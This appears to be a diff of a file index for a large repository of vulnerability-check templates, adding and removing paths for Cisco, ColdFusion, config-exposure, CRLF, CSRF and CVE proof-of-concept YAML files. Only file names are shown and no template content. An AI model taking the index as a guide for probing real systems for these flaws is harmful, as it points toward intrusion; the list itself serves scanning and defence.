+./poc/cisco/cisco-finesse-login-940.yaml ./poc/cisco/cisco-finesse-login.yaml ./poc/cisco/cisco-finger-detect.yaml ./poc/cisco/cisco-imc-supervisor.yaml @@ -5521,32 +5486,30 @@ ./poc/cisco/cisco-ios-xe-panel.yaml ./poc/cisco/cisco-iox.yaml ./poc/cisco/cisco-meeting-app.yaml +./poc/cisco/cisco-meraki-exposure-944.yaml ./poc/cisco/cisco-meraki-exposure-945.yaml -./poc/cisco/cisco-meraki-exposure-946.yaml ./poc/cisco/cisco-meraki-exposure.yaml ./poc/cisco/cisco-meraki-workflow.yaml ./poc/cisco/cisco-network-config-947.yaml ./poc/cisco/cisco-network-config-948.yaml -./poc/cisco/cisco-network-config-949.yaml ./poc/cisco/cisco-network-config-950.yaml ./poc/cisco/cisco-network-config-951.yaml +./poc/cisco/cisco-network-config.yaml ./poc/cisco/cisco-nexus-data-broker.yaml ./poc/cisco/cisco-onprem-panel.yaml -./poc/cisco/cisco-prime-infrastructure-952.yaml ./poc/cisco/cisco-prime-infrastructure-953.yaml +./poc/cisco/cisco-prime-infrastructure-954.yaml ./poc/cisco/cisco-prime-infrastructure.yaml ./poc/cisco/cisco-prime-network-registrar.yaml ./poc/cisco/cisco-rv-series-rce.yaml +./poc/cisco/cisco-sd-wan-955.yaml ./poc/cisco/cisco-sd-wan-956.yaml -./poc/cisco/cisco-sd-wan-957.yaml ./poc/cisco/cisco-sd-wan.yaml ./poc/cisco/cisco-secure-cn-959.yaml ./poc/cisco/cisco-secure-cn.yaml ./poc/cisco/cisco-secure-desktop-960.yaml ./poc/cisco/cisco-secure-desktop-961.yaml -./poc/cisco/cisco-secure-desktop-962.yaml ./poc/cisco/cisco-secure-desktop.yaml -./poc/cisco/cisco-security-details-963.yaml ./poc/cisco/cisco-security-details-964.yaml ./poc/cisco/cisco-security-details.yaml ./poc/cisco/cisco-sendgrid-965.yaml @@ -5554,19 +5517,19 @@ ./poc/cisco/cisco-sendgrid-968.yaml ./poc/cisco/cisco-sendgrid.yaml ./poc/cisco/cisco-smi-exposure-970.yaml -./poc/cisco/cisco-smi-exposure-972.yaml +./poc/cisco/cisco-smi-exposure-971.yaml ./poc/cisco/cisco-smi-exposure.yaml ./poc/cisco/cisco-ssl-vpn.yaml +./poc/cisco/cisco-systems-login-973.yaml ./poc/cisco/cisco-systems-login-974.yaml -./poc/cisco/cisco-systems-login-975.yaml ./poc/cisco/cisco-systems-login.yaml +./poc/cisco/cisco-telepresence-976.yaml ./poc/cisco/cisco-telepresence-977.yaml -./poc/cisco/cisco-telepresence-978.yaml ./poc/cisco/cisco-telepresence.yaml ./poc/cisco/cisco-ucm.yaml ./poc/cisco/cisco-ucs-director-panel-detect.yaml ./poc/cisco/cisco-ucs-director.yaml -./poc/cisco/cisco-ucs-kvm-login-980.yaml +./poc/cisco/cisco-ucs-kvm-login-979.yaml ./poc/cisco/cisco-ucs-kvm-login.yaml ./poc/cisco/cisco-unity-express-panel-detect.yaml ./poc/cisco/cisco-unity-panel.yaml @@ -5583,7 +5546,6 @@ ./poc/coldfusion/adobe-coldfusion-detect-4.yaml ./poc/coldfusion/adobe-coldfusion-detect-5.yaml ./poc/coldfusion/adobe-coldfusion-detect-6.yaml -./poc/coldfusion/adobe-coldfusion-detect-82.yaml ./poc/coldfusion/adobe-coldfusion-detect-83.yaml ./poc/coldfusion/adobe-coldfusion-detect-84.yaml ./poc/coldfusion/adobe-coldfusion-detector-1.yaml @@ -5594,8 +5556,9 @@ ./poc/coldfusion/adobe-coldfusion-detector-6.yaml ./poc/coldfusion/adobe-coldfusion-detector-error.yaml ./poc/coldfusion/adobe-coldfusion-error-detect-85.yaml +./poc/coldfusion/adobe-coldfusion-error-detect-86.yaml ./poc/coldfusion/adobe-coldfusion-error-detect-87.yaml -./poc/coldfusion/adobe-coldfusion-error-detect-88.yaml +./poc/coldfusion/adobe-coldfusion-error-detect.yaml ./poc/coldfusion/better-messages-wcfm-integration-6477bf18cad6c823db485408d49b337b.yaml ./poc/coldfusion/better-messages-wcfm-integration-ff9293ba28748efa2ab9a2fe77385468.yaml ./poc/coldfusion/better-messages-wcfm-integration.yaml @@ -5611,9 +5574,9 @@ ./poc/coldfusion/coldfusion-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/coldfusion/coldfusion-debug-xss-1.yaml ./poc/coldfusion/coldfusion-debug-xss-1152.yaml +./poc/coldfusion/coldfusion-debug-xss-1153.yaml ./poc/coldfusion/coldfusion-debug-xss-1154.yaml ./poc/coldfusion/coldfusion-debug-xss-2.yaml -./poc/coldfusion/coldfusion-debug-xss.yaml ./poc/coldfusion/coldfusion-files.yaml ./poc/coldfusion/coldfusion-lucee-auth-bypass.yaml ./poc/coldfusion/coldfusion-theme-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -5624,6 +5587,7 @@ ./poc/coldfusion/tenda-w15e-routercfm-cfg-config-leak.yaml ./poc/coldfusion/unpatched-coldfusion-10977.yaml ./poc/coldfusion/unpatched-coldfusion-10978.yaml +./poc/coldfusion/unpatched-coldfusion-10979.yaml ./poc/coldfusion/unpatched-coldfusion.yaml ./poc/coldfusion/wcfm-marketplace-rest-api-83211a697400a39f3ef0aefc82922e72.yaml ./poc/coldfusion/wcfm-marketplace-rest-api.yaml @@ -5649,17 +5613,16 @@ ./poc/config/account-confirmation-link-manipulation.yaml ./poc/config/aem_misconfig.yaml ./poc/config/aerohive-netconfig-ui-199.yaml +./poc/config/aerohive-netconfig-ui-200.yaml ./poc/config/aerohive-netconfig-ui-201.yaml -./poc/config/aerohive-netconfig-ui.yaml ./poc/config/airflow-configuration-exposure-229.yaml -./poc/config/airflow-configuration-exposure.yaml +./poc/config/airflow-configuration-exposure-230.yaml ./poc/config/alibaba-canal-config-leak.yaml ./poc/config/amazon-docker-config-279.yaml -./poc/config/amazon-docker-config-280.yaml -./poc/config/amazon-docker-config-disclosure-278.yaml ./poc/config/amazon-docker-config-disclosure.yaml +./poc/config/amazon-docker-config.yaml ./poc/config/ansible-config-disclosure-325.yaml -./poc/config/ansible-config-disclosure.yaml +./poc/config/ansible-config-disclosure-326.yaml ./poc/config/apache-config-343.yaml ./poc/config/apache-config-344.yaml ./poc/config/apache-config-exposure.yaml @@ -5667,26 +5630,31 @@ ./poc/config/apache-httpd-conf-disclosure.yaml ./poc/config/apache-httpd-conf-exposure.yml ./poc/config/api-iconfinder-438.yaml +./poc/config/api-iconfinder-439.yaml ./poc/config/aws-config-not-enabled.yaml ./poc/config/aws-s3-misconfig.yaml ./poc/config/awstats-config-1.yaml ./poc/config/awstats-config-2.yaml ./poc/config/awstats-config-655.yaml -./poc/config/awstats-config.yaml +./poc/config/awstats-config-656.yaml ./poc/config/azure-pipelines-config-disclosure.yaml ./poc/config/basic-cors-misconfig.yaml ./poc/config/bigip-config-utility-detect-1.yaml ./poc/config/bigip-config-utility-detect-2.yaml ./poc/config/bigip-config-utility-detect-3.yaml +./poc/config/bigip-config-utility-detect-730.yaml ./poc/config/bigip-config-utility-detect-731.yaml +./poc/config/bigip-config-utility-detect-732.yaml ./poc/config/bigip-config-utility-detect.yaml -./poc/config/buffalo-config-injection-798.yaml ./poc/config/buffalo-config-injection-799.yaml +./poc/config/buffalo-config-injection-800.yaml +./poc/config/buffalo-config-injection-801.yaml ./poc/config/buffalo-config-injection.yaml ./poc/config/cache-control-header-misconfiguration.yaml ./poc/config/child-theme-configurator.yaml ./poc/config/chinatelecomequipmentwebconfigurationsystem.yaml ./poc/config/circleci-config-922.yaml +./poc/config/circleci-config-923.yaml ./poc/config/circleci-config-925.yaml ./poc/config/circleci-config.yaml ./poc/config/circleci-ssh-config-926.yaml @@ -5695,9 +5663,9 @@ ./poc/config/circleci-ssh-config.yaml ./poc/config/cisco-network-config-947.yaml ./poc/config/cisco-network-config-948.yaml -./poc/config/cisco-network-config-949.yaml ./poc/config/cisco-network-config-950.yaml ./poc/config/cisco-network-config-951.yaml +./poc/config/cisco-network-config.yaml ./poc/config/cloud-config.yaml ./poc/config/cloud-storage-misconfig.yaml ./poc/config/coep-misconfig.yaml @@ -5713,7 +5681,8 @@ ./poc/config/config-js.yaml ./poc/config/config-parameters-yml.yaml ./poc/config/config-properties.yaml -./poc/config/config-rb-1180.yaml +./poc/config/config-rb-1179.yaml +./poc/config/config-rb.yaml ./poc/config/config.php.new.yaml ./poc/config/config.yaml ./poc/config/config.yml @@ -5743,15 +5712,15 @@ ./poc/config/confluence-dashboard.yaml ./poc/config/confluence-detect-1.yaml ./poc/config/confluence-detect-1186.yaml -./poc/config/confluence-detect-1187.yaml ./poc/config/confluence-detect-1188.yaml +./poc/config/confluence-detect-1189.yaml ./poc/config/confluence-detect-2.yaml ./poc/config/confluence-detect-3.yaml ./poc/config/confluence-detect-4.yaml ./poc/config/confluence-detect.yaml ./poc/config/confluence-ssrf-sharelinks-1190.yaml ./poc/config/confluence-ssrf-sharelinks-1191.yaml -./poc/config/confluence-ssrf-sharelinks-1193.yaml +./poc/config/confluence-ssrf-sharelinks-1192.yaml ./poc/config/confluence-ssrf-sharelinks-1194.yaml ./poc/config/confluence-workflow-1195.yaml ./poc/config/confluence-workflow.yaml @@ -5765,6 +5734,7 @@ ./poc/config/coremail-config-disclosure-1216.yaml ./poc/config/coremail-config-disclosure.yaml ./poc/config/cors-misconfig-1222.yaml +./poc/config/cors-misconfig-1223.yaml ./poc/config/cors-misconfig-1224.yaml ./poc/config/debug-log-config-tool-de2ab3ada51607e8bc54fae30ad1a036.yaml ./poc/config/debug-log-config-tool.yaml @@ -5785,13 +5755,12 @@ ./poc/config/docker-compose-config-7.yaml ./poc/config/docker-compose-config-7057.yaml ./poc/config/docker-compose-config-7058.yaml -./poc/config/docker-compose-config-7059.yaml +./poc/config/docker-compose-config.yaml ./poc/config/docker-compose-config.yml ./poc/config/docker-misconfigured-api.yaml ./poc/config/dockercfg-config-1.yaml ./poc/config/dockercfg-config-2.yaml ./poc/config/dockercfg-config-7056.yaml -./poc/config/dockercfg-config.yaml ./poc/config/dockerrun-aws-config-page.yaml ./poc/config/dompdf-config.yaml ./poc/config/drupal_module-config_pages-information-disclosure.yaml @@ -5825,7 +5794,6 @@ ./poc/config/firebase-config-exposure-7485.yaml ./poc/config/firebase-config-exposure-7486.yaml ./poc/config/firebase-config-exposure-7488.yaml -./poc/config/firebase-config-exposure.yaml ./poc/config/firebase-config-file.yaml ./poc/config/firebase-config.yaml ./poc/config/fps-config.yaml @@ -5833,13 +5801,15 @@ ./poc/config/front-page-misconfig-2.yaml ./poc/config/front-page-misconfig-7545.yaml ./poc/config/front-page-misconfig-7546.yaml +./poc/config/front-page-misconfig-7547.yaml ./poc/config/front-page-misconfig-7550.yaml ./poc/config/front-page-misconfig.yaml +./poc/config/ftpconfig-7565.yaml ./poc/config/ftpconfig-7566.yaml -./poc/config/ftpconfig.yaml ./poc/config/gcs-misconfig.yaml ./poc/config/git-config-7633.yaml ./poc/config/git-config-7634.yaml +./poc/config/git-config-7635.yaml ./poc/config/git-config-7636.yaml ./poc/config/git-config-7637.yaml ./poc/config/git-config-7638.yaml @@ -5852,20 +5822,21 @@ ./poc/config/git-config-nginxoffbyslash-5.yaml ./poc/config/git-config-nginxoffbyslash-6.yaml ./poc/config/git-config-nginxoffbyslash-7.yaml +./poc/config/git-config-nginxoffbyslash-7628.yaml ./poc/config/git-config-nginxoffbyslash-7629.yaml +./poc/config/git-config-nginxoffbyslash-7630.yaml ./poc/config/git-config-nginxoffbyslash-7631.yaml -./poc/config/git-config-nginxoffbyslash-7632.yaml ./poc/config/git-config-nginxoffbyslash-8.yaml ./poc/config/git-config-nginxoffbyslash-9.yaml ./poc/config/git-config-nginxoffbyslash.yaml ./poc/config/git-config.yaml +./poc/config/github-page-config-7654.yaml ./poc/config/github-page-config-7655.yaml ./poc/config/github-page-config-7656.yaml ./poc/config/gitlab-config-exposure.yml ./poc/config/glpi-fusioninventory-misconfig.yaml ./poc/config/gocd-cruise-configuration-7746.yaml ./poc/config/gocd-cruise-configuration-7747.yaml -./poc/config/gocd-cruise-configuration-7748.yaml ./poc/config/gocd-cruise-configuration.yaml ./poc/config/grafana-exposed-configuration.yaml ./poc/config/grandstream-device-configuration.yaml @@ -5877,13 +5848,13 @@ ./poc/config/heuristic-scanning-not-configured.yaml ./poc/config/hikvision-camera-bypass-configuration-file-download.yaml ./poc/config/honeywell-scada-config-7989.yaml +./poc/config/honeywell-scada-config-7990.yaml ./poc/config/honeywell-scada-config-7991.yaml -./poc/config/honeywell-scada-config-7992.yaml -./poc/config/honeywell-scada-config.yaml ./poc/config/htaccess-config-8042.yaml +./poc/config/htaccess-config-8043.yaml ./poc/config/htaccess-config.yaml ./poc/config/httpd-config-8054.yaml -./poc/config/httpd-config.yaml +./poc/config/httpd-config-8055.yaml ./poc/config/huace-Config-infoLeak.yaml ./poc/config/huace-mews-config-xml-infoleak.yaml ./poc/config/huiwen-book-config-properties-info-leak.yaml @@ -5900,9 +5871,9 @@ ./poc/config/kafka-misconfig.yaml ./poc/config/keycloak-openid-config-1.yaml ./poc/config/keycloak-openid-config-2.yaml -./poc/config/keycloak-openid-config-8475.yaml ./poc/config/keycloak-openid-config-8476.yaml ./poc/config/keycloak-openid-config-8477.yaml +./poc/config/keycloak-openid-config.yaml ./poc/config/login-configurator-14616c5034dd1ddef5b9442340e35c8b.yaml ./poc/config/login-configurator-aeebbaa9f5df299f369d13242d94e3a5.yaml ./poc/config/login-configurator-fe19785cecc9ded62fb9e19ffd55d7fb.yaml @@ -5913,16 +5884,16 @@ ./poc/config/magento-config-8700.yaml ./poc/config/magento-config-8701.yaml ./poc/config/magento-config-8703.yaml -./poc/config/magento-config-disclosure.yaml ./poc/config/magento-config.yaml ./poc/config/manageengine-network-config.yaml ./poc/config/misconfig.yaml ./poc/config/misconfigured-concrete5.yaml +./poc/config/misconfigured-docker-8900.yaml ./poc/config/misconfigured-docker-8901.yaml -./poc/config/misconfigured-docker-8902.yaml ./poc/config/misconfigured-docker.yaml ./poc/config/misconfigured-redis.yaml ./poc/config/msmtp-config-8966.yaml +./poc/config/msmtp-config-8967.yaml ./poc/config/nconf-panel.yaml ./poc/config/nexus-repo-config-exposure.yml ./poc/config/nexus-repository-exposed-configuration.yaml @@ -5930,8 +5901,8 @@ ./poc/config/nginx-config-9096.yaml ./poc/config/nginx-config-9097.yaml ./poc/config/nginx-config-9098.yaml +./poc/config/nginx-config-9099.yaml ./poc/config/nginx-config-exposure.yaml -./poc/config/nginx-config.yaml ./poc/config/nginx_Misconfiguration.yaml ./poc/config/nuclei_esConfig.yaml ./poc/config/om-video-conferencing.yaml @@ -5942,7 +5913,7 @@ ./poc/config/oracle-ebs-config-disclosure.yaml ./poc/config/owncloud-config-9419.yaml ./poc/config/owncloud-config.yaml -./poc/config/parameters-config-9465.yaml +./poc/config/parameters-config.yaml ./poc/config/phinx-config.yaml ./poc/config/php-fpm-config-9513.yaml ./poc/config/php-fpm-config-9514.yaml @@ -5951,10 +5922,10 @@ ./poc/config/prod-conf.yaml ./poc/config/proftpd-config-9666.yaml ./poc/config/proftpd-config.yaml +./poc/config/prometheus-config-9673.yaml ./poc/config/prometheus-config-endpoint-9671.yaml ./poc/config/prometheus-config-endpoint-9672.yaml ./poc/config/prometheus-config-endpoint.yaml -./poc/config/prometheus-config.yaml ./poc/config/publish-confirm-message-be37091b7b8e5fc7583cd9ff3bba3042.yaml ./poc/config/publish-confirm-message.yaml ./poc/config/rabbitmq-config-exposure.yml @@ -5979,7 +5950,7 @@ ./poc/config/saltstack-config-panel.yaml ./poc/config/samba-config-9985.yaml ./poc/config/samba-config-9986.yaml -./poc/config/samba-config-9987.yaml +./poc/config/samba-config.yaml ./poc/config/seeyon-a6-config-disclosure.yaml ./poc/config/server-config-exposure.yaml ./poc/config/sftp-config-exposure.yaml @@ -5990,8 +5961,8 @@ ./poc/config/springboot-autoconfig-1.yaml ./poc/config/springboot-autoconfig-10437.yaml ./poc/config/springboot-autoconfig-2.yaml -./poc/config/springboot-autoconfig.yaml ./poc/config/springboot-configprops-1.yaml +./poc/config/springboot-configprops-10442.yaml ./poc/config/springboot-configprops-10443.yaml ./poc/config/springboot-configprops-10444.yaml ./poc/config/springboot-configprops-10445.yaml @@ -6004,23 +5975,22 @@ ./poc/config/svnserve-config.yaml ./poc/config/symfony-database-config-10614.yaml ./poc/config/symfony-database-config-10615.yaml -./poc/config/symfony-database-config-10616.yaml -./poc/config/symfony-database-config.yaml +./poc/config/symfony-database-config-10617.yaml ./poc/config/symfony-security-config-1.yaml ./poc/config/symfony-security-config-2.yaml ./poc/config/tasmota-config-webui.yaml ./poc/config/tcpconfig-10664.yaml ./poc/config/tcpconfig-10665.yaml ./poc/config/tcpconfig-10666.yaml +./poc/config/tcpconfig.yaml ./poc/config/techbridge-cloud-conference.yaml ./poc/config/tenda-w15e-routercfm-cfg-config-leak.yaml ./poc/config/the-conference-22b4ad0345c7f065a84ce9174ab4fe7e.yaml ./poc/config/the-conference.yaml ./poc/config/truffle-config-exposure.yaml ./poc/config/tugboat-config-exposure-10841.yaml -./poc/config/tugboat-config-exposure-10842.yaml +./poc/config/tugboat-config-exposure-10843.yaml ./poc/config/tugboat-config-exposure-10844.yaml -./poc/config/tugboat-config-exposure.yaml ./poc/config/unconfirmed-abc400f143f0254b15b00169f8369d29.yaml ./poc/config/unconfirmed.yaml ./poc/config/v2-video-conferencing.yaml @@ -6051,14 +6021,12 @@ ./poc/config/videowhisper-video-conference-integration-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/config/videowhisper-video-conference-integration-plugin.yaml ./poc/config/videowhisper-video-conference-integration.yaml -./poc/config/wamp-server-configuration-11096.yaml ./poc/config/wamp-server-configuration-11097.yaml ./poc/config/wamp-server-configuration-11098.yaml ./poc/config/wanhu-ezoffice-teleconferenceservice-xxe.yaml ./poc/config/wanhu-oa-tele-conference-service-xxe.yaml ./poc/config/web-config-11123.yaml ./poc/config/web-config-11124.yaml -./poc/config/web-config-11125.yaml ./poc/config/web-config-11126.yaml ./poc/config/web-config-11127.yaml ./poc/config/web-config.yaml @@ -6081,7 +6049,6 @@ ./poc/config/wordpress-accessible-wpconfig-10.yaml ./poc/config/wordpress-accessible-wpconfig-11.yaml ./poc/config/wordpress-accessible-wpconfig-11234.yaml -./poc/config/wordpress-accessible-wpconfig-11235.yaml ./poc/config/wordpress-accessible-wpconfig-11237.yaml ./poc/config/wordpress-accessible-wpconfig-11238.yaml ./poc/config/wordpress-accessible-wpconfig-11239.yaml @@ -6104,7 +6071,6 @@ ./poc/config/wordpress-accessible-wpconfig.yaml ./poc/config/wordpress-config-disclosure.yaml ./poc/config/wordpress-git-config-1.yaml -./poc/config/wordpress-git-config-11278.yaml ./poc/config/wordpress-git-config-11279.yaml ./poc/config/wordpress-git-config-2.yaml ./poc/config/wordpress-misconfig.yaml @@ -6130,12 +6096,11 @@ ./poc/config/wpconfig-aws-keys-2.yaml ./poc/config/wpconfig-aws-keys.yaml ./poc/config/wpconfig.yaml -./poc/config/wpengine-config-check.yaml ./poc/config/wpeprivate-config-disclosure.yaml ./poc/config/ws-config.yaml ./poc/config/yunbox-baolei-config-fastjson-rce.yaml ./poc/config/zend-config-file-11777.yaml -./poc/config/zend-config-file-11779.yaml +./poc/config/zend-config-file-11778.yaml ./poc/config/zend-config-file.yaml ./poc/config/zimbra-config-exposure.yml ./poc/cpanel/OFJAAAH-cpanelXSS.yaml @@ -6148,6 +6113,7 @@ ./poc/crlf_injection/crlf-injection-1.yaml ./poc/crlf_injection/crlf-injection-1260.yaml ./poc/crlf_injection/crlf-injection-1261.yaml +./poc/crlf_injection/crlf-injection-1262.yaml ./poc/crlf_injection/crlf-injection-1263.yaml ./poc/crlf_injection/crlf-injection-1264.yaml ./poc/crlf_injection/crlf-injection-1265.yaml @@ -6176,8 +6142,8 @@ ./poc/cross_site_request_forgery/csrf-token-missing.yaml ./poc/cross_site_request_forgery/csrf.yaml ./poc/cross_site_request_forgery/csrf2.yaml -./poc/cross_site_request_forgery/csrfguard-detect-1290.yaml ./poc/cross_site_request_forgery/csrfguard-detect-1291.yaml +./poc/cross_site_request_forgery/csrfguard-detect.yaml ./poc/cross_site_request_forgery/django-debug-exposure-csrf.yaml ./poc/cross_site_request_forgery/drupal_module-cloud-csrf.yaml ./poc/cross_site_request_forgery/hidden-csrf-token.yaml @@ -6266,6 +6232,7 @@ ./poc/cve/CNVD-2021-15822.yaml ./poc/cve/CNVD-2021-15824.yaml ./poc/cve/CNVD-2021-17369.yaml +./poc/cve/CNVD-2021-26422.yaml ./poc/cve/CNVD-2021-30167-1.yaml ./poc/cve/CNVD-2021-30167-2.yaml ./poc/cve/CNVD-2021-30167.yaml @@ -12485,6 +12452,7 @@ ./poc/cve/CVE-2019-8943.yaml ./poc/cve/CVE-2019-8982.yaml ./poc/cve/CVE-2019-9041.yaml +./poc/cve/CVE-2019-9082 (copy 2).yaml ./poc/cve/CVE-2019-9082.yaml ./poc/cve/CVE-2019-9168-8538d93dc59d2dac55aa865d48cc9611.yaml ./poc/cve/CVE-2019-9168.yaml @@ -12540,7 +12508,6 @@ ./poc/cve/CVE-2019-9978.yaml ./poc/cve/CVE-2020-0618.yaml ./poc/cve/CVE-2020-0646.yaml -./poc/cve/CVE-2020-10124 (copy 1).yaml ./poc/cve/CVE-2020-10124.yaml ./poc/cve/CVE-2020-10148 (copy 2).yaml ./poc/cve/CVE-2020-10148.yaml @@ -17337,6 +17304,7 @@ ./poc/cve/CVE-2022-0919.yaml ./poc/cve/CVE-2022-0920-a3427aad6ed07b9d0cef564d7db0125c.yaml ./poc/cve/CVE-2022-0920.yaml +./poc/cve/CVE-2022-0921.yaml ./poc/cve/CVE-2022-0928.yaml ./poc/cve/CVE-2022-0948-99020965bb89f1929411392421aa5e11.yaml ./poc/cve/CVE-2022-0948.yaml @@ -25565,6 +25533,7 @@ ./poc/cve/CVE-2023-34032.yaml ./poc/cve/CVE-2023-34033-1ebbafba0851b62098503319589fcf92.yaml ./poc/cve/CVE-2023-34033.yaml +./poc/cve/CVE-2023-34039.yaml ./poc/cve/CVE-2023-3404-b422833eade5f8c090e65b44154f3e9e.yaml ./poc/cve/CVE-2023-3404.yaml ./poc/cve/CVE-2023-3407-46533b3cbb6a8d63a3a806bab7acc70b.yaml @@ -31385,6 +31354,7 @@ ./poc/cve/CVE-2024-1178.yaml ./poc/cve/CVE-2024-1181-e1aeb270ea4b669129dd0982e0118a5d.yaml ./poc/cve/CVE-2024-1181.yaml +./poc/cve/CVE-2024-1183.yaml ./poc/cve/CVE-2024-1203-cede147cec5ebe1dea014170dd370ad1.yaml ./poc/cve/CVE-2024-1203.yaml ./poc/cve/CVE-2024-1204-71ef2dafaa4ce9d17d3dff19cd522221.yaml @@ -34946,6 +34916,7 @@ ./poc/cve/CVE-2024-32640.yaml ./poc/cve/CVE-2024-3265-f7037b4d5ba1f01f180fdea2f2f81d6e.yaml ./poc/cve/CVE-2024-3265.yaml +./poc/cve/CVE-2024-32651.yaml ./poc/cve/CVE-2024-3266-2b13ea444681b03f5c12cb9a9613ae86.yaml ./poc/cve/CVE-2024-3266.yaml ./poc/cve/CVE-2024-3267-84dd6ac30e76a438ef520f1f7b3b7c6e.yaml @@ -36000,6 +35971,7 @@ ./poc/cve/CVE-2024-3565-4c380b36845ecda09785bb681a06a59e.yaml ./poc/cve/CVE-2024-3565.yaml ./poc/cve/CVE-2024-35668-ae50ce1b29ca73379d7c86a29c71520b.yaml +./poc/cve/CVE-2024-35668.yaml ./poc/cve/CVE-2024-35672-486db9c86df3e8118b4d673efcb7bc70.yaml ./poc/cve/CVE-2024-35672.yaml ./poc/cve/CVE-2024-35673-e1796442c9c94fea31305d80d3cc86c1.yaml @@ -36096,6 +36068,7 @@ ./poc/cve/CVE-2024-3667-f6d21d0de8da3dd348f9b7d2ad61f464.yaml ./poc/cve/CVE-2024-3667.yaml ./poc/cve/CVE-2024-3668-c8ffa38e284a09e692ef63a2e54e8547.yaml +./poc/cve/CVE-2024-3668.yaml ./poc/cve/CVE-2024-3670-fec3724139e128cadbd86aa3d4c79b55.yaml ./poc/cve/CVE-2024-3670.yaml ./poc/cve/CVE-2024-3671-ad0547b9184ff8fbd7390245f489244d.yaml @@ -36636,6 +36609,7 @@ ./poc/cve/CVE-2024-4463-464edc1eb3da2f9faf49c20859246d3c.yaml ./poc/cve/CVE-2024-4463.yaml ./poc/cve/CVE-2024-4468-e4718b86eead992f27bd617ba2db3191.yaml +./poc/cve/CVE-2024-4468.yaml ./poc/cve/CVE-2024-4469-da6061bf111a6e16e1ce2e21b77e6884.yaml ./poc/cve/CVE-2024-4469.yaml ./poc/cve/CVE-2024-4470-b43bea79e12b8b0c9f748d9c7ecf554d.yaml @@ -36741,6 +36715,7 @@ ./poc/cve/CVE-2024-4656-a5e8e9e2c51f12bcd24fc196b5414cb9.yaml ./poc/cve/CVE-2024-4656.yaml ./poc/cve/CVE-2024-4661-aa576507b767db894aef4c7b0b19b027.yaml +./poc/cve/CVE-2024-4661.yaml ./poc/cve/CVE-2024-4662-ab6e1b5977dc25cd02eb75a7c6103282.yaml ./poc/cve/CVE-2024-4662.yaml ./poc/cve/CVE-2024-4666-9132c7c1d96c4459b618f35c7b1deff4.yaml @@ -36892,9 +36867,11 @@ ./poc/cve/CVE-2024-5086-5878d22a233b8390d013118c3ec1a8f6.yaml ./poc/cve/CVE-2024-5086.yaml ./poc/cve/CVE-2024-5087-cdef2f6a63a1cc20224c34166a3e2dbe.yaml +./poc/cve/CVE-2024-5087.yaml ./poc/cve/CVE-2024-5088-16710672833e29d7b1683a03043820a1.yaml ./poc/cve/CVE-2024-5088.yaml ./poc/cve/CVE-2024-5091-50b2eecb2e1c04b3eff9ad58a7dd3c08.yaml +./poc/cve/CVE-2024-5091.yaml ./poc/cve/CVE-2024-5092-0f4aaeb58c0f91afc705b391dbdf7872.yaml ./poc/cve/CVE-2024-5092.yaml ./poc/cve/CVE-2024-5141-f003c81bdb67e0c478e1919516cc1594.yaml @@ -37012,22 +36989,28 @@ ./poc/cve/CVE-2024-5612-94c0f75b45145ba79530a3cebd812f91.yaml ./poc/cve/CVE-2024-5612.yaml ./poc/cve/CVE-2024-5613-9198b92debd41a94962756dcf76a3013.yaml +./poc/cve/CVE-2024-5613.yaml ./poc/cve/CVE-2024-5615-a77f3367ed2460f7ee46222aadc62216.yaml ./poc/cve/CVE-2024-5615.yaml ./poc/cve/CVE-2024-5637-52143d378292b1918b667c9107493dca.yaml ./poc/cve/CVE-2024-5637.yaml ./poc/cve/CVE-2024-5638-6b2bb507df8cc9b0ced9db594103e225.yaml +./poc/cve/CVE-2024-5638.yaml ./poc/cve/CVE-2024-5640-97926cf22b75d273b8be77e89027662a.yaml ./poc/cve/CVE-2024-5640.yaml ./poc/cve/CVE-2024-5645-1e0813366396dcffd446ea61fbcc4596.yaml ./poc/cve/CVE-2024-5645.yaml ./poc/cve/CVE-2024-5654-745e9ead8e1605f56e0df1bcb3525879.yaml +./poc/cve/CVE-2024-5654.yaml ./poc/cve/CVE-2024-5656-ed8938bd52fad7e4bf20c235a5cc7800.yaml ./poc/cve/CVE-2024-5656.yaml ./poc/cve/CVE-2024-5663-00dcb12873f526a638405780c6dcbe5f.yaml +./poc/cve/CVE-2024-5663.yaml ./poc/cve/CVE-2024-5665-fbf91f7b36454225b577032ff6b93e9b.yaml ./poc/cve/CVE-2024-5665.yaml ./poc/cve/CVE-2024-5758-637eadcd24b75860f6993f7f01fc3e2a.yaml +./poc/cve/CVE-2024-5758.yaml +./poc/cve/CVE-2024-5770-535af98dd21b180aed9353b26ab61bf4.yaml ./poc/cve/CVE_RCE2-1.yaml ./poc/cve/CheckCVE_2021_21972.yaml ./poc/cve/Confluence_CVE-2022-26134.yaml @@ -37060,65 +37043,64 @@ ./poc/cve/cnvd-2018-13393-1038.yaml ./poc/cve/cnvd-2019-01348-1040.yaml ./poc/cve/cnvd-2019-01348-1041.yaml -./poc/cve/cnvd-2019-01348-1042.yaml ./poc/cve/cnvd-2019-01348-1043.yaml +./poc/cve/cnvd-2019-01348-1044.yaml ./poc/cve/cnvd-2019-01348-1045.yaml +./poc/cve/cnvd-2019-06255-1046.yaml ./poc/cve/cnvd-2019-06255-1047.yaml ./poc/cve/cnvd-2019-06255-1048.yaml ./poc/cve/cnvd-2019-06255-1049.yaml -./poc/cve/cnvd-2019-06255-1050.yaml ./poc/cve/cnvd-2019-19299-1052.yaml -./poc/cve/cnvd-2019-32204-1054.yaml +./poc/cve/cnvd-2019-32204-1053.yaml ./poc/cve/cnvd-2020-23735-1056.yaml ./poc/cve/cnvd-2020-23735-1057.yaml ./poc/cve/cnvd-2020-23735-1058.yaml ./poc/cve/cnvd-2020-23735-1059.yaml ./poc/cve/cnvd-2020-46552-1060.yaml ./poc/cve/cnvd-2020-46552.yaml +./poc/cve/cnvd-2020-56167-1061.yaml ./poc/cve/cnvd-2020-56167-1062.yaml ./poc/cve/cnvd-2020-56167-1063.yaml -./poc/cve/cnvd-2020-56167-1064.yaml ./poc/cve/cnvd-2020-62422-1065.yaml ./poc/cve/cnvd-2020-62422-1066.yaml ./poc/cve/cnvd-2020-62422-1067.yaml -./poc/cve/cnvd-2020-62422-1068.yaml +./poc/cve/cnvd-2020-62422-1069.yaml ./poc/cve/cnvd-2020-67113-1071.yaml ./poc/cve/cnvd-2020-67113-1072.yaml -./poc/cve/cnvd-2020-68596-1073.yaml +./poc/cve/cnvd-2020-68596-1074.yaml ./poc/cve/cnvd-2020-68596-1075.yaml ./poc/cve/cnvd-2020-68596-1076.yaml ./poc/cve/cnvd-2021-01931-1077.yaml 